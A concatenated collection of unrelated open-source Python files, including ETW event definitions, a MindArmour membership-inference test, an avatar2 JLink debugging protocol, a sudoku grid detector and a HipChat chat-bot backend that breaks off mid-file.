@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=115, version=1)
class HidEventFilter_115_1(Etw):
pattern = Struct(
"Message" / WString,
"AcpiNotificationValue" / Int32ul
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=117, version=1)
class HidEventFilter_117_1(Etw):
pattern = Struct(
"Message" / WString,
"IndicatorsStatus" / Int32ul
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=127, version=1)
class HidEventFilter_127_1(Etw):
pattern = Struct(
"Request" / Int64ul,
"Queue" / Int64ul,
"OutputBufferLength" / Int64ul,
"InputBufferLength" / Int64ul,
"IOCTL" / Int64ul
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=128, version=1)
class HidEventFilter_128_1(Etw):
pattern = Struct(
"Request" / Int64ul,
"Status" / Int32ul
)
|
test/Actions/addpost-link-fixture/strip.py
|
moroten/scons
| 1,403 |
115586
|
<reponame>moroten/scons
import sys
print("strip.py: %s" % " ".join(sys.argv[1:]))
|
common/trainers/trecqa_trainer.py
|
karkaroff/castor
| 132 |
115593
|
<gh_stars>100-1000
from .qa_trainer import QATrainer
class TRECQATrainer(QATrainer):
pass
|
benchmark/bench_redirect_from_logging.py
|
YoavCohen/logbook
| 771 |
115608
|
"""Tests redirects from logging to logbook"""
from logging import getLogger
from logbook import StreamHandler
from logbook.compat import redirect_logging
from cStringIO import StringIO
redirect_logging()
log = getLogger('Test logger')
def run():
out = StringIO()
with StreamHandler(out):
for x in xrange(500):
log.warning('this is not handled')
assert out.getvalue().count('\n') == 500
|
liota/dccs/dcc.py
|
giyyanan/liota
| 361 |
115621
|
<filename>liota/dccs/dcc.py
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------#
# Copyright © 2015-2016 VMware, Inc. All Rights Reserved. #
# #
# Licensed under the BSD 2-Clause License (the “License”); you may not use #
# this file except in compliance with the License. #
# #
# The BSD 2-Clause License #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions are met:#
# #
# - Redistributions of source code must retain the above copyright notice, #
# this list of conditions and the following disclaimer. #
# #
# - Redistributions in binary form must reproduce the above copyright #
# notice, this list of conditions and the following disclaimer in the #
# documentation and/or other materials provided with the distribution. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"#
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE #
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE #
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE #
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR #
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF #
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN #
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) #
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF #
# THE POSSIBILITY OF SUCH DAMAGE. #
# ----------------------------------------------------------------------------#
import logging
from abc import ABCMeta, abstractmethod
from liota.entities.entity import Entity
from liota.dcc_comms.dcc_comms import DCCComms
from liota.entities.metrics.registered_metric import RegisteredMetric
log = logging.getLogger(__name__)
class DataCenterComponent:
"""
Abstract base class for all DCCs.
"""
__metaclass__ = ABCMeta
@abstractmethod
def __init__(self, comms):
"""
Abstract init method for DCC (Data Center Component).
:param comms: DccComms Object
"""
if not isinstance(comms, DCCComms):
log.error("DCCComms object is expected.")
raise TypeError("DCCComms object is expected.")
self.comms = comms
@abstractmethod
def register(self, entity_obj):
"""
Abstract register method to register an Entity Object with the Dcc. Call this method from subclasses for a type
check.
If successful RegisteredEntity should be returned by DCC implementation. Raise an exception if failed.
:param entity_obj: Entity Object to be registered.
:return:
"""
if not isinstance(entity_obj, Entity):
log.error("Entity object is expected.")
raise TypeError("Entity object is expected.")
@abstractmethod
def create_relationship(self, reg_entity_parent, reg_entity_child):
"""
Abstract create_relationship method to create a relationship between a parent and a child entity.
:param reg_entity_parent: RegisteredEntity object of the parent.
:param reg_entity_child: RegisteredEntity object of the child.
:return:
"""
pass
@abstractmethod
def _format_data(self, reg_metric):
"""
Abstract _format_data method. This is a private method and it should take care of formatting the message
in a structure specific to a DCC.
:param reg_metric: RegisteredMetric Object
:return: Formatted message string
"""
pass
def publish(self, reg_metric):
"""
Publishes the formatted message to the Dcc using DccComms.
Users must pass MessagingAttributes Object as part of RegisteredMetric Objects wherever necessary.
This method EXPECTS MessagingAttributes to be passed in RegisteredMetric's 'msg_attr' attribute.
:param reg_metric: RegisteredMetricObject.
:return:
"""
if not isinstance(reg_metric, RegisteredMetric):
log.error("RegisteredMetric object is expected.")
raise TypeError("RegisteredMetric object is expected.")
message = self._format_data(reg_metric)
if message:
if hasattr(reg_metric, 'msg_attr'):
self.comms.send(message, reg_metric.msg_attr)
else:
self.comms.send(message, None)
@abstractmethod
def set_properties(self, reg_entity, properties):
"""
Abstract set_properties method. DCCs should implement this method to allow RegisteredEntities to set their
properties.
:param reg_entity: RegisteredEntity Object
:param properties: Property String, List or Dict dependant on DCC implementation
:return:
"""
pass
@abstractmethod
def unregister(self, entity_obj):
"""
Abstract unregister method. DCCs should implement this method to un-register an Entity.
:param entity_obj: Entity Object
:return:
"""
if not isinstance(entity_obj, Entity):
raise TypeError
class RegistrationFailure(Exception):
"""
Raise this exception in case of registration failure with the DCC.
"""
pass
|
tests/ut/python/privacy/evaluation/test_membership_inference.py
|
hboshnak/mindarmour
| 139 |
115640
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
membership inference test
"""
import pytest
import numpy as np
import mindspore.dataset as ds
from mindspore import nn
from mindspore.train import Model
import mindspore.context as context
from mindarmour.privacy.evaluation import MembershipInference
from tests.ut.python.utils.mock_net import Net
context.set_context(mode=context.GRAPH_MODE)
def dataset_generator():
"""mock training data."""
batch_size = 16
batches = 1
data = np.random.randn(batches*batch_size, 1, 32, 32).astype(
np.float32)
label = np.random.randint(0, 10, batches*batch_size).astype(np.int32)
for i in range(batches):
yield data[i*batch_size:(i + 1)*batch_size],\
label[i*batch_size:(i + 1)*batch_size]
@pytest.mark.level0
@pytest.mark.platform_x86_ascend_training
@pytest.mark.platform_arm_ascend_training
@pytest.mark.env_onecard
@pytest.mark.component_mindarmour
def test_get_membership_inference_object():
net = Net()
loss = nn.SoftmaxCrossEntropyWithLogits(sparse=True)
opt = nn.Momentum(params=net.trainable_params(), learning_rate=0.1, momentum=0.9)
model = Model(network=net, loss_fn=loss, optimizer=opt)
inference_model = MembershipInference(model, -1)
assert isinstance(inference_model, MembershipInference)
@pytest.mark.level0
@pytest.mark.platform_x86_ascend_training
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_gpu_training
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
@pytest.mark.component_mindarmour
def test_membership_inference_object_train():
net = Net()
loss = nn.SoftmaxCrossEntropyWithLogits(sparse=True)
opt = nn.Momentum(params=net.trainable_params(), learning_rate=0.1, momentum=0.9)
model = Model(network=net, loss_fn=loss, optimizer=opt)
inference_model = MembershipInference(model, 2)
assert isinstance(inference_model, MembershipInference)
config = [{
"method": "KNN",
"params": {
"n_neighbors": [3, 5, 7],
}
}]
ds_train = ds.GeneratorDataset(dataset_generator,
["image", "label"])
ds_test = ds.GeneratorDataset(dataset_generator,
["image", "label"])
inference_model.train(ds_train, ds_test, config)
@pytest.mark.level0
@pytest.mark.platform_x86_ascend_training
@pytest.mark.platform_arm_ascend_training
@pytest.mark.env_onecard
@pytest.mark.component_mindarmour
def test_membership_inference_eval():
net = Net()
loss = nn.SoftmaxCrossEntropyWithLogits(sparse=True)
opt = nn.Momentum(params=net.trainable_params(), learning_rate=0.1, momentum=0.9)
model = Model(network=net, loss_fn=loss, optimizer=opt)
inference_model = MembershipInference(model, -1)
assert isinstance(inference_model, MembershipInference)
eval_train = ds.GeneratorDataset(dataset_generator,
["image", "label"])
eval_test = ds.GeneratorDataset(dataset_generator,
["image", "label"])
metrics = ["precision", "accuracy", "recall"]
inference_model.eval(eval_train, eval_test, metrics)
|
e4e_projection.py
|
Harry45/JoJoGAN
| 1,051 |
115670
|
<gh_stars>1000+
import os
import sys
import numpy as np
from PIL import Image
import torch
import torchvision.transforms as transforms
from argparse import Namespace
from e4e.models.psp import pSp
from util import *
@ torch.no_grad()
def projection(img, name, device='cuda'):
model_path = 'models/e4e_ffhq_encode.pt'
ckpt = torch.load(model_path, map_location='cpu')
opts = ckpt['opts']
opts['checkpoint_path'] = model_path
opts= Namespace(**opts)
net = pSp(opts, device).eval().to(device)
transform = transforms.Compose(
[
transforms.Resize(256),
transforms.CenterCrop(256),
transforms.ToTensor(),
transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5]),
]
)
img = transform(img).unsqueeze(0).to(device)
images, w_plus = net(img, randomize_noise=False, return_latents=True)
result_file = {}
result_file['latent'] = w_plus[0]
torch.save(result_file, name)
return w_plus[0]
|
tutorial/stage0/setup.py
|
cloudmatrix/esky
| 190 |
115727
|
<gh_stars>100-1000
import sys
# for windows
# > python setup.py py2exe
if sys.argv[1] == 'py2exe':
import py2exe
from distutils.core import setup
setup(
name = "example-app",
version = "0.0",
console = ["example.py"]
)
# for mac
# > python setup.py py2app
elif sys.argv[1] == 'py2app':
from setuptools import setup
setup(
name = "example-app",
app=["example.py"],
version = "0.0",
setup_requires=["py2app"],
options={'py2app':{}},
)
# cx freeze cross platform
# > python setup.py build
elif sys.argv[1] == 'build':
from cx_Freeze import setup, Executable
setup(
name = 'example-app',
version = '0.0',
executables=[Executable('example.py')],
)
|
Ryven/packages/auto_generated/selectors/nodes.py
|
tfroehlich82/Ryven
| 2,872 |
115742
|
from NENV import *
import selectors
class NodeBase(Node):
pass
class _Can_Use_Node(NodeBase):
"""
Check if we can use the selector depending upon the
operating system. """
title = '_can_use'
type_ = 'selectors'
init_inputs = [
NodeInputBP(label='method'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, selectors._can_use(self.input(0)))
class _Fileobj_To_Fd_Node(NodeBase):
"""
Return a file descriptor from a file object.
Parameters:
fileobj -- file object or file descriptor
Returns:
corresponding file descriptor
Raises:
ValueError if the object is invalid
"""
title = '_fileobj_to_fd'
type_ = 'selectors'
init_inputs = [
NodeInputBP(label='fileobj'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, selectors._fileobj_to_fd(self.input(0)))
class Abstractmethod_Node(NodeBase):
"""
A decorator indicating abstract methods.
Requires that the metaclass is ABCMeta or derived from it. A
class that has a metaclass derived from ABCMeta cannot be
instantiated unless all of its abstract methods are overridden.
The abstract methods can be called using any of the normal
'super' call mechanisms. abstractmethod() may be used to declare
abstract methods for properties and descriptors.
Usage:
class C(metaclass=ABCMeta):
@abstractmethod
def my_abstract_method(self, ...):
...
"""
title = 'abstractmethod'
type_ = 'selectors'
init_inputs = [
NodeInputBP(label='funcobj'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, selectors.abstractmethod(self.input(0)))
class Namedtuple_Node(NodeBase):
"""
Returns a new subclass of tuple with named fields.
>>> Point = namedtuple('Point', ['x', 'y'])
>>> Point.__doc__ # docstring for the new class
'Point(x, y)'
>>> p = Point(11, y=22) # instantiate with positional args or keywords
>>> p[0] + p[1] # indexable like a plain tuple
33
>>> x, y = p # unpack like a regular tuple
>>> x, y
(11, 22)
>>> p.x + p.y # fields also accessible by name
33
>>> d = p._asdict() # convert to a dictionary
>>> d['x']
11
>>> Point(**d) # convert from a dictionary
Point(x=11, y=22)
>>> p._replace(x=100) # _replace() is like str.replace() but targets named fields
Point(x=100, y=22)
"""
title = 'namedtuple'
type_ = 'selectors'
init_inputs = [
NodeInputBP(label='typename'),
NodeInputBP(label='field_names'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, selectors.namedtuple(self.input(0), self.input(1)))
export_nodes(
_Can_Use_Node,
_Fileobj_To_Fd_Node,
Abstractmethod_Node,
Namedtuple_Node,
)
|
utils/management/commands/rqworker.py
|
schiederme/peering-manager
| 173 |
115777
|
from django.conf import settings
from django_rq.management.commands.rqworker import Command as C
class Command(C):
"""
Subclass django_rq's built-in rqworker to listen on all configured queues if none
are specified (instead of only the 'default' queue).
"""
def handle(self, *args, **options):
if len(args) < 1:
args = settings.RQ_QUEUES
super().handle(*args, **options)
|
examples/outliers/alibi-detect-combiner/pipeline/outliersdetector/Detector.py
|
jsreid13/seldon-core
| 3,049 |
115815
|
<reponame>jsreid13/seldon-core
import logging
import dill
import os
import numpy as np
dirname = os.path.dirname(__file__)
class Detector:
def __init__(self, *args, **kwargs):
with open(os.path.join(dirname, "preprocessor.dill"), "rb") as prep_f:
self.preprocessor = dill.load(prep_f)
with open(os.path.join(dirname, "model.dill"), "rb") as model_f:
self.od = dill.load(model_f)
def predict(self, X, feature_names=[]):
logging.info("Input: " + str(X))
X_prep = self.preprocessor.transform(X)
output = self.od.predict(X_prep)['data']['is_outlier']
logging.info("Output: " + str(output))
return output
|
src/extract_n_solve/grid_detector.py
|
krishnabagaria/sudoku-solver
| 615 |
115825
|
import cv2
from settings import *
from src.solving_objects.MyHoughLines import *
from src.solving_objects.MyHoughPLines import *
def line_intersection(my_line1, my_line2):
line1 = [[my_line1[0], my_line1[1]], [my_line1[2], my_line1[3]]]
line2 = [[my_line2[0], my_line2[1]], [my_line2[2], my_line2[3]]]
xdiff = (line1[0][0] - line1[1][0], line2[0][0] - line2[1][0])
ydiff = (line1[0][1] - line1[1][1], line2[0][1] - line2[1][1])
def det(a, b):
return a[0] * b[1] - a[1] * b[0]
div = det(xdiff, ydiff)
if div == 0:
raise Exception('lines do not intersect')
d = (det(*line1), det(*line2))
x = det(d, xdiff) / div
y = det(d, ydiff) / div
return [int(x), int(y)]
def look_for_intersections_hough(lines):
hor_up = (1000, 1000, 1000, 1000) # x1,y1,x2,y2
hor_down = (0, 0, 0, 0) # x1,y1,x2,y2
ver_left = (1000, 1000, 1000, 1000) # x1,y1,x2,y2
ver_right = (0, 0, 0, 0) # x1,y1,x2,y2
for line in [line for line in lines if not line.isMerged]:
lim = line.get_limits()
if line.theta < np.pi / 4: # Ligne Verticale
if lim[0] + lim[2] < ver_left[0] + ver_left[2]:
ver_left = lim
elif lim[0] + lim[2] > ver_right[0] + ver_right[2]:
ver_right = lim
else:
if lim[1] + lim[3] < hor_up[1] + hor_up[3]:
hor_up = lim
elif lim[1] + lim[3] > hor_down[1] + hor_down[3]:
hor_down = lim
# raw_limits_lines = [hor_up, hor_down, ver_left, ver_right]
grid_limits = list()
grid_limits.append(line_intersection(hor_up, ver_left))
grid_limits.append(line_intersection(hor_up, ver_right))
grid_limits.append(line_intersection(hor_down, ver_right))
grid_limits.append(line_intersection(hor_down, ver_left))
return grid_limits
def find_corners(contour):
top_left = [10000, 10000]
top_right = [0, 10000]
bottom_right = [0, 0]
bottom_left = [10000, 0]
# contour_x = sorted(contour,key = lambda c:c[0][0])
# contour_y = sorted(contour,key = lambda c:c[0][1])
mean_x = np.mean(contour[:, :, 0])
mean_y = np.mean(contour[:, :, 1])
for j in range(len(contour)):
x, y = contour[j][0]
if x > mean_x: # On right
if y > mean_y: # On bottom
bottom_right = [x, y]
else:
top_right = [x, y]
else:
if y > mean_y: # On bottom
bottom_left = [x, y]
else:
top_left = [x, y]
return [top_left, top_right, bottom_right, bottom_left]
def get_hough_transform(img, edges, display=False):
my_lines = []
img_after_merge = img.copy()
lines_raw = cv2.HoughLines(edges, 1, np.pi / 180, thresh_hough)
for line in lines_raw:
my_lines.append(MyHoughLines(line))
if display:
for line in my_lines:
x1, y1, x2, y2 = line.get_limits()
cv2.line(img, (x1, y1), (x2, y2), (0, 0, 255), 2)
merge_lines(my_lines)
grid_limits = look_for_intersections_hough(my_lines)
if display:
for line in [line for line in my_lines if not line.isMerged]:
x1, y1, x2, y2 = line.get_limits()
cv2.line(img_after_merge, (x1, y1), (x2, y2), (255, 0, 0), 2)
for point in grid_limits:
x, y = point
cv2.circle(img_after_merge, (x, y), 10, (255, 0, 0), 3)
if not display:
return grid_limits
else:
return grid_limits, img, img_after_merge
class GridDetector:
def __init__(self, display=False):
self.__display = display
def extract_grids(self, frame):
# Get a threshed image which emphasize lines
threshed_img = self.thresh_img(frame)
# Look for grids corners
grids_corners_list = self.look_for_grids_corners(threshed_img)
# Use grids corners to unwrap img !
unwraped_grid_list, transfo_matrix = self.unwrap_grids(frame, grids_corners_list)
return unwraped_grid_list, grids_corners_list, transfo_matrix
@staticmethod
def thresh_img(frame):
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
gray_enhance = (gray - gray.min()) * int(255 / (gray.max() - gray.min()))
blurred = cv2.GaussianBlur(gray_enhance, (5, 5), 0)
thresh = cv2.adaptiveThreshold(blurred, 255,
cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY,
block_size_big, mean_sub_big)
thresh_not = cv2.bitwise_not(thresh)
kernel_close = np.ones((5, 5), np.uint8)
closing = cv2.morphologyEx(thresh_not, cv2.MORPH_CLOSE, kernel_close) # Delete space between line
dilate = cv2.morphologyEx(closing, cv2.MORPH_DILATE, kernel_close) # Delete space between line
return dilate
@staticmethod
def unwrap_grids(frame, points_grids):
undistorted_grids = []
transfo_matrix_list = []
for points_grid in points_grids:
final_pts = np.array(
[[0, 0], [target_w_grid - 1, 0],
[target_w_grid - 1, target_h_grid - 1], [0, target_h_grid - 1]],
dtype=np.float32)
transfo_mat = cv2.getPerspectiveTransform(points_grid, final_pts)
undistorted_grids.append(cv2.warpPerspective(frame, transfo_mat, (target_w_grid, target_h_grid)))
transfo_matrix_list.append(np.linalg.inv(transfo_mat))
return undistorted_grids, transfo_matrix_list
@staticmethod
def look_for_grids_corners(img_lines):
contours, _ = cv2.findContours(img_lines, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
best_contours = []
contours = sorted(contours, key=cv2.contourArea, reverse=True)
biggest_area = cv2.contourArea(contours[0])
for cnt in contours:
area = cv2.contourArea(cnt)
if area < smallest_area_allow:
break
if area > biggest_area / ratio_lim:
peri = cv2.arcLength(cnt, True)
approx = cv2.approxPolyDP(cnt, approx_poly_coef * peri, True)
if len(approx) == 4:
best_contours.append(approx)
corners = []
for best_contour in best_contours:
corners.append(find_corners(best_contour))
return np.array(corners, dtype=np.float32)
if __name__ == '__main__':
# im_path = "dataset_test/021.jpg"
im_path = "images_test/sudoku.jpg"
# im_path = "tmp/030.jpg"
# im_path = "images_test/imagedouble.jpg"
# im_path = "images_test/izi_distord.jpg"
im = cv2.imread(im_path)
cv2.imshow("im", im)
detector = GridDetector()
res_grids_final, _, _ = detector.extract_grids(im)
if res_grids_final is not None:
for (i, im_grid) in enumerate(res_grids_final):
cv2.imshow('grid_final_{}'.format(i), im_grid)
cv2.imwrite('images_test/grid_cut_{}.jpg'.format(i), im_grid)
cv2.waitKey()
|
tests/roots/test-ext-autodoc/target/imported_members.py
|
samdoran/sphinx
| 4,973 |
115833
|
from .partialfunction import func2, func3
|
avatar2/protocols/jlink.py
|
ispras/avatar2
| 415 |
115861
|
import sys
import pylink
from time import sleep
from threading import Thread, Event, Condition
import logging
import re
if sys.version_info < (3, 0):
import Queue as queue
# __class__ = instance.__class__
else:
import queue
from avatar2.archs.arm import ARM
from avatar2.targets import TargetStates
from avatar2.message import AvatarMessage, UpdateStateMessage, BreakpointHitMessage
class JLinkProtocol(Thread):
"""Main class for the JLink bprotocol, via pylink-square
:ivar serial: The serial number of the JLink to connect to
:ivar device: The JLink device name for the target
:ivar avatar: the avatar object
:ivar origin: the target utilizing this protocol
"""
def __init__(self, serial="12345678", device="ARM7", avatar=None, origin=None):
self._shutdown = Event()
self.avatar = avatar
self.origin = origin
self.jlink = pylink.JLink()
self.jlink.open(serial)
self.log = logging.getLogger('%s.%s' %
(origin.log.name, self.__class__.__name__)
) if origin else \
logging.getLogger(self.__class__.__name__)
Thread.__init__(self)
self.connect(device=device)
def __del__(self):
self.shutdown()
def connect(self, device="ARM7"):
# Todo add a time out here
while True:
try:
self.jlink.connect(device, verbose=True)
self.jlink.ir_len()
break
except pylink.errors.JLinkException:
self.log.info("Connection failed, trying again...")
sleep(0.25)
self.log.info("Connected to JLink target")
self.start()
return True
def reset(self, halt=True):
self.log.info("Resetting target")
return self.jlink.reset(halt=halt)
def shutdown(self):
self._shutdown.set()
def update_target_regs(self):
"""
This function will try to update the TargetRegs based on the list of
registers known to gdb.
"""
regs = {}
for idx in self.jlink.register_list():
name = self.jlink.register_name(idx)
regs[name] = idx
if hasattr(self.origin, 'regs'):
self.origin.regs._update(regs)
def run(self):
# Target state management thread
# This thread needs to poll for the halted state
# of the target
# JLink is lame and doesn't let you do this asynch
# Also, not all targets produce a "moe" (Mode of Entry)
# so we have to actually do that here.
try:
while not self._shutdown.is_set():
is_halted = self.jlink.halted()
if is_halted and self.origin.state == TargetStates.RUNNING:
# We just halted
# But did we hit a BP?
self.log.debug("JLink Target is halting...")
avatar_msg = UpdateStateMessage(self.origin, TargetStates.STOPPED)
self.avatar.fast_queue.put(avatar_msg)
self.origin.wait()
self.log.debug("JLink target has halted")
pc = self.get_pc()
if self.jlink.breakpoint_find(pc):
self.log.debug("JLink Target hit breakpoint %d" % self.jlink.breakpoint_find(pc))
avatar_msg = BreakpointHitMessage(self.origin, self.jlink.breakpoint_find(pc), pc)
self.avatar.queue.put(avatar_msg)
elif not is_halted and self.origin.state == TargetStates.STOPPED:
self.log.debug("About to resume target.")
avatar_msg = UpdateStateMessage(self.origin, TargetStates.RUNNING)
self.avatar.fast_queue.put(avatar_msg)
while self.origin.state != TargetStates.RUNNING:
pass
self.log.debug("JLink target has resumed")
except:
self.log.exception("JLink target errored")
finally:
self.log.info("JLink target exiting")
self.jlink.close()
def set_breakpoint(self, line,
hardware=False,
temporary=False,
regex=False,
condition=None,
ignore_count=0,
thread=0,
pending=False):
"""Inserts a breakpoint
:param bool hardware: Hardware breakpoint
:param bool temporary: Tempory breakpoint
:param str regex: If set, inserts breakpoints matching the regex
:param str condition: If set, inserts a breakpoint with specified condition
:param int ignore_count: Amount of times the bp should be ignored
:param int thread: Threadno in which this breakpoints should be added
:returns: The number of the breakpoint
"""
# TODO: Hw/Sw breakpoint control
self.log.info("Setting breakpoint at %#08x" % line)
ret = self.jlink.breakpoint_set(line)
self.log.info("Got BP ID %d" % ret)
return ret
def set_watchpoint(self, variable, write=True, read=False):
return self.jlink.watchpoint_set(variable, write=write, read=read)
def remove_breakpoint(self, bkpt):
"""Deletes a breakpoint"""
# TODO: Check this
return self.jlink.breakpoint_clear(bkpt)
def write_memory(self, address, wordsize, val, num_words=1, raw=False):
"""Writes memory
:param address: Address to write to
:param wordsize: the size of the write (1, 2, 4 or 8)
:param val: the written value
:type val: int if num_words == 1 and raw == False
list if num_words > 1 and raw == False
str or byte if raw == True
:param num_words: The amount of words to read
:param raw: Specifies whether to write in raw or word mode
:returns: True on success else False
"""
if raw:
new_val = []
if not len(val):
raise ValueError("val had zero length")
new_val = [ord(v) for v in val]
val = new_val
try:
self.jlink.memory_write(address, contents)
return True
except pylink.JLinkException:
return False
def read_memory(self, address, wordsize=4, num_words=1, raw=False):
"""reads memory
:param address: Address to write to
:param wordsize: the size of a read word (1, 2, 4 or 8)
:param num_words: the amount of read words
:param raw: Whether the read memory should be returned unprocessed
:return: The read memory
"""
ret = self.jlink.memory_read(address, num_units=num_words, nbits=wordsize)
if raw:
raw_mem = "".join([newint.to_bytes(i, length=int(math.ceil(i.bit_length() / 8.0))) for i in ret])
return raw_mem
return ret
def read_register(self, reg):
the_reg = tolower(reg)
the_idx = -1
for idx in self.jlink.register_list():
if the_reg == self.jlink.register_name(idx):
the_idx = idx
break
return self.register_read(the_idx)
def get_pc(self):
# Get PC a shitty way
for idx in self.jlink.register_list():
if "PC" in self.jlink.register_name(idx):
return self.jlink.register_read(idx)
def write_register(self, reg, val):
"""Set one register on the target
:returns: True on success"""
the_reg = tolower(reg)
the_idx = -1
for idx in self.jlink.register_list():
if the_reg == self.jlink.register_name(idx):
the_idx = idx
break
return self.jlink.register_write(the_idx, val)
def step(self):
"""Step one instruction on the target
:returns: True on success"""
return self.jlink.step()
def cont(self):
"""Continues the execution of the target
:returns: True on success"""
self.log.info("Resuming target...")
return self.jlink.restart()
def stop(self):
"""Stops execution of the target
:returns: True on success"""
self.log.info("Stopping target...")
return self.jlink.halt()
def set_endianness(self, endianness='little'):
if 'little' in endianness:
self.jlink.set_little_endian()
elif "big" in endianness:
self.jlink.set_big_endian()
|
f5/multi_device/cluster/test/functional/teardown_exist.py
|
nghia-tran/f5-common-python
| 272 |
115869
|
from f5.bigip import ManagementRoot
from f5.cluster.cluster_manager import ClusterManager
a = ManagementRoot('10.190.20.202', 'admin', 'admin')
b = ManagementRoot('10.190.20.203', 'admin', 'admin')
c = ManagementRoot('10.190.20.204', 'admin', 'admin')
cm = ClusterManager([a, b], 'testing_cluster', 'Common', 'sync-failover')
cm.teardown_cluster()
|
will/backends/io_adapters/hipchat.py
|
Ashex/will
| 349 |
115910
|
from datetime import datetime
import json
import logging
from multiprocessing.queues import Empty
from multiprocessing import Process, Queue
import random
import re
import requests
import pickle
import sys
import time
import threading
import traceback
from sleekxmpp import ClientXMPP
from sleekxmpp.exceptions import IqError, IqTimeout
from .base import IOBackend
from will import settings
from will.utils import is_admin
from will.acl import is_acl_allowed
from will.abstractions import Event, Message, Person, Channel
from will.utils import Bunch, UNSURE_REPLIES, clean_for_pickling
from will.mixins import StorageMixin, PubSubMixin
ROOM_NOTIFICATION_URL = "https://%(server)s/v2/room/%(room_id)s/notification?auth_token=%(token)s"
ROOM_TOPIC_URL = "https://%(server)s/v2/room/%(room_id)s/topic?auth_token=%(token)s"
ROOM_URL = "https://%(server)s/v2/room/%(room_id)s/?auth_token=%(token)s"
SET_TOPIC_URL = "https://%(server)s/v2/room/%(room_id)s/topic?auth_token=%(token)s"
PRIVATE_MESSAGE_URL = "https://%(server)s/v2/user/%(user_id)s/message?auth_token=%(token)s"
USER_DETAILS_URL = "https://%(server)s/v2/user/%(user_id)s?auth_token=%(token)s"
ALL_USERS_URL = ("https://%(server)s/v2/user?auth_token=%(token)s&start-index"
"=%(start_index)s&max-results=%(max_results)s")
ALL_ROOMS_URL = ("https://%(server)s/v2/room?auth_token=%(token)s&start-index"
"=%(start_index)s&max-results=%(max_results)s&expand=items")
# From RoomsMixins
V1_TOKEN_URL = "https://%(server)s/v1/rooms/list?auth_token=%(token)s"
V2_TOKEN_URL = "https://%(server)s/v2/room?auth_token=%(token)s&expand=items"
class HipChatRosterMixin(object):
@property
def people(self):
if not hasattr(self, "_people"):
self._people = self.load('will_hipchat_people', {})
return self._people
@property
def internal_roster(self):
logging.warn(
"mixin.internal_roster has been deprecated. Please use mixin.people instead. "
"internal_roster will be removed at the end of 2017"
)
return self.people
def get_user_by_full_name(self, name):
for jid, info in self.people.items():
if info["name"] == name:
return info
return None
def get_user_by_nick(self, nick):
for jid, info in self.people.items():
if info["nick"] == nick:
return info
return None
def get_user_by_jid(self, jid):
if jid in self.people:
return self.people[jid]
return None
def get_user_from_message(self, message):
if message["type"] == "groupchat":
if "xmpp_jid" in message:
user = self.get_user_by_jid(message["xmpp_jid"])
if user:
return user
elif "from" in message:
full_name = message["from"].split("/")[1]
user = self.get_user_by_full_name(full_name)
if user:
return user
if "mucnick" in message:
return self.get_user_by_full_name(message["mucnick"])
elif message['type'] in ('chat', 'normal'):
jid = ("%s" % message["from"]).split("@")[0].split("_")[1]
return self.get_user_by_jid(jid)
else:
return None
def message_is_from_admin(self, message):
nick = self.get_user_from_message(message)['nick']
return is_admin(nick)
def message_is_allowed(self, message, acl):
nick = self.get_user_from_message(message)['nick']
return is_acl_allowed(nick, acl)
def get_user_by_hipchat_id(self, id):
for jid, info in self.people.items():
if info["hipchat_id"] == id:
return info
return None
class HipChatRoom(Bunch):
@property
def id(self):
if 'room_id' in self:
# Using API v1
return self['room_id']
elif 'id' in self:
# Using API v2
return self['id']
else:
raise TypeError('Room ID not found')
@property
def history(self):
payload = {"auth_token": settings.HIPCHAT_V2_TOKEN}
response = requests.get("https://{1}/v2/room/{0}/history".format(str(self.id),
settings.HIPCHAT_SERVER),
params=payload, **settings.REQUESTS_OPTIONS)
data = json.loads(response.text)['items']
for item in data:
item['date'] = datetime.strptime(item['date'][:-13], "%Y-%m-%dT%H:%M:%S")
return data
@property
def participants(self):
payload = {"auth_token": settings.HIPCHAT_V2_TOKEN}
response = requests.get(
"https://{1}/v2/room/{0}/participant".format(
str(self.id),
settings.HIPCHAT_SERVER
